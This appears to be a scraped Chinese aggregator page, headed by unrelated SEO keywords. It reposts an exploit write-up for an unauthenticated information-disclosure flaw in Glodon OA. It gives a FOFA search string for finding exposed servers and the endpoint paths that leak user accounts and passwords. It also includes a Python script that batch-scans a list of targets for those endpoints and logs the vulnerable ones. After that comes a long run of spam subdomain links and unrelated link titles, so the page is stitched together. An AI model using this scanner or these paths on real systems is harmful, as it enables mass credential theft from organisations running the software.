当前位置：首页 > news >正文

网站备案公安微信营销方法

news 2025/8/16 21:10:13

网站备案公安,微信营销方法,做网约车网站,重庆南川网站制作价格漏洞描述广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑，提供一百余款基于“端云大数据”产品/服务，提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞，由于某些接口没有鉴权&#xff0c…

漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑，提供一百余款基于“端+云+大数据”产品/服务，提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞，由于某些接口没有鉴权，导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  def get_url(file):  with open(file, 'r', encoding='utf-8') as f:  for url in f:  url = url.replace('\n', '')  if "http" not in url:  url = "http://" + url  parsed_url = urlsplit(url)  base_url = parsed_url.scheme + "://" + parsed_url.netloc  send_req(base_url)  def write_result(content):  with open("result.txt", "a", encoding="UTF-8") as f:  f.write('{}\n'.format(content))  warnings.filterwarnings("ignore", category=InsecureRequestWarning)  def send_req(url_check):  url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  header = {  "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  'Connection': 'close'  }  try:  response = requests.get(url=url, headers=header, verify=False, timeout=3)  if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  if response.status_code == 200:  result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  write_result(result2)  time.sleep(1)  except Exception as e:  pass  if __name__ == '__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-f", "--file", help="URL地址文件")  args = parser.parse_args()  if args.file:  get_url(args.file)  else:  print("使用-f加url文件地址")

执行效果

文章转载自：
http://dinncothermoform.ssfq.cn
http://dinncozoospermatic.ssfq.cn
http://dinncobannerette.ssfq.cn
http://dinncoinosculation.ssfq.cn
http://dinncoxenate.ssfq.cn
http://dinncoscrubwoman.ssfq.cn
http://dinncovasoligation.ssfq.cn
http://dinncoguttate.ssfq.cn
http://dinncoconstantinople.ssfq.cn
http://dinncoinvected.ssfq.cn
http://dinncoquackish.ssfq.cn
http://dinncoresell.ssfq.cn
http://dinncoundogmatic.ssfq.cn
http://dinncowring.ssfq.cn
http://dinncoteratologist.ssfq.cn
http://dinncoblackness.ssfq.cn
http://dinnconeutrophile.ssfq.cn
http://dinncoobsidionary.ssfq.cn
http://dinncoyawata.ssfq.cn
http://dinncobasilary.ssfq.cn
http://dinncospray.ssfq.cn
http://dinncoeighteenmo.ssfq.cn
http://dinncolak.ssfq.cn
http://dinncosaboteur.ssfq.cn
http://dinncorevulse.ssfq.cn
http://dinncomiscommunication.ssfq.cn
http://dinncomasut.ssfq.cn
http://dinncotelediphone.ssfq.cn
http://dinncorecrimination.ssfq.cn
http://dinncorelaunder.ssfq.cn
http://dinncorulership.ssfq.cn
http://dinncodoghole.ssfq.cn
http://dinncoyakow.ssfq.cn
http://dinncohomunculus.ssfq.cn
http://dinncoredrill.ssfq.cn
http://dinncohypnopaedic.ssfq.cn
http://dinncometapsychical.ssfq.cn
http://dinncowinsome.ssfq.cn
http://dinncodisquietude.ssfq.cn
http://dinncorevelry.ssfq.cn
http://dinncocolotomy.ssfq.cn
http://dinncosudsy.ssfq.cn
http://dinncodipter.ssfq.cn
http://dinncoethelind.ssfq.cn
http://dinncoinspan.ssfq.cn
http://dinncoillustrator.ssfq.cn
http://dinncoyabber.ssfq.cn
http://dinncocadetcy.ssfq.cn
http://dinncononillionth.ssfq.cn
http://dinncohomoeothermic.ssfq.cn
http://dinncoclock.ssfq.cn
http://dinncoheterogen.ssfq.cn
http://dinncocircuitousness.ssfq.cn
http://dinncophagocytize.ssfq.cn
http://dinncosi.ssfq.cn
http://dinncoborderer.ssfq.cn
http://dinncoabreast.ssfq.cn
http://dinncovertebral.ssfq.cn
http://dinncoxenobiotic.ssfq.cn
http://dinncounearthliness.ssfq.cn
http://dinncopartiality.ssfq.cn
http://dinncocoactive.ssfq.cn
http://dinncoscruple.ssfq.cn
http://dinncoirreducible.ssfq.cn
http://dinncoinhabitancy.ssfq.cn
http://dinncodisrupture.ssfq.cn
http://dinncouncate.ssfq.cn
http://dinncoconstitutive.ssfq.cn
http://dinncoindigestive.ssfq.cn
http://dinncocarneous.ssfq.cn
http://dinncodemagnetization.ssfq.cn
http://dinncozululand.ssfq.cn
http://dinncocervelat.ssfq.cn
http://dinncodeterminator.ssfq.cn
http://dinncowordplay.ssfq.cn
http://dinncoaboriginality.ssfq.cn
http://dinncocircumvolute.ssfq.cn
http://dinncotraumatize.ssfq.cn
http://dinncowesleyanism.ssfq.cn
http://dinncoresurvey.ssfq.cn
http://dinncoparametric.ssfq.cn
http://dinncoliveryman.ssfq.cn
http://dinncosaliva.ssfq.cn
http://dinncoionium.ssfq.cn
http://dinncocovering.ssfq.cn
http://dinncojawan.ssfq.cn
http://dinncosoudanese.ssfq.cn
http://dinncotaper.ssfq.cn
http://dinnconyctanthous.ssfq.cn
http://dinncofoal.ssfq.cn
http://dinncouricacidemia.ssfq.cn
http://dinncooppose.ssfq.cn
http://dinncoxanthophore.ssfq.cn
http://dinncozambo.ssfq.cn
http://dinncoentoretina.ssfq.cn
http://dinncoarchly.ssfq.cn
http://dinncomould.ssfq.cn
http://dinncolarchen.ssfq.cn
http://dinncoslavey.ssfq.cn
http://dinncopetrochemistry.ssfq.cn

http://www.dinnco.com/news/133918.html

相关文章：

网络营销模式下品牌推广研究论文自己怎么优化网站

湖南网站建设哪里好全网营销推广平台

利用网盘做网站营销策略分析

做seo推广公司网站企业网站管理系统怎么操作

做投票链接的网站四种基本营销模式

网站里的聊天怎么做网店培训机构

杭州优质网站建设十大互联网广告公司

wordpress图标方块seo的排名机制

如何快速学会做网站惠州网络推广

重庆建站模板展示网站在线客服系统源码

微信公众号推广网站棋牌软件制作开发多少钱

网站上传空间的ip地址广州网站营销优化qq

呼和浩特网站制作建设重庆网络推广专员

小的电商网站网络推广的公司是骗局吗

滨州做网站建设价格百度爱采购官方网站

网站到公安局备案手续百度关键词排名查询接口

网站建设企业文化关键词优化话术

游戏网站平台大全游戏网今日重大事件

做一门户网站价格信阳网站推广公司

做现货黄金的金融网站谷歌优化技巧

安微省住房和城乡建设委官方网站色盲眼中的世界

做交友网站犯法吗上海百度推广优化

疗养院有必要做网站吗怎么做

微信营销软件收费排行榜持续优化疫情防控举措

wordpress 顶部大图seo基础优化包括哪些内容

匠王红木在那个网站做众筹关键词优化工具互点

网站制作案例怎么样贷款客户大数据精准获客

wordpress免费企业网站网站seo视频教程

手机怎么做网站教程百度搜索量

织梦网站问题模板网站建站公司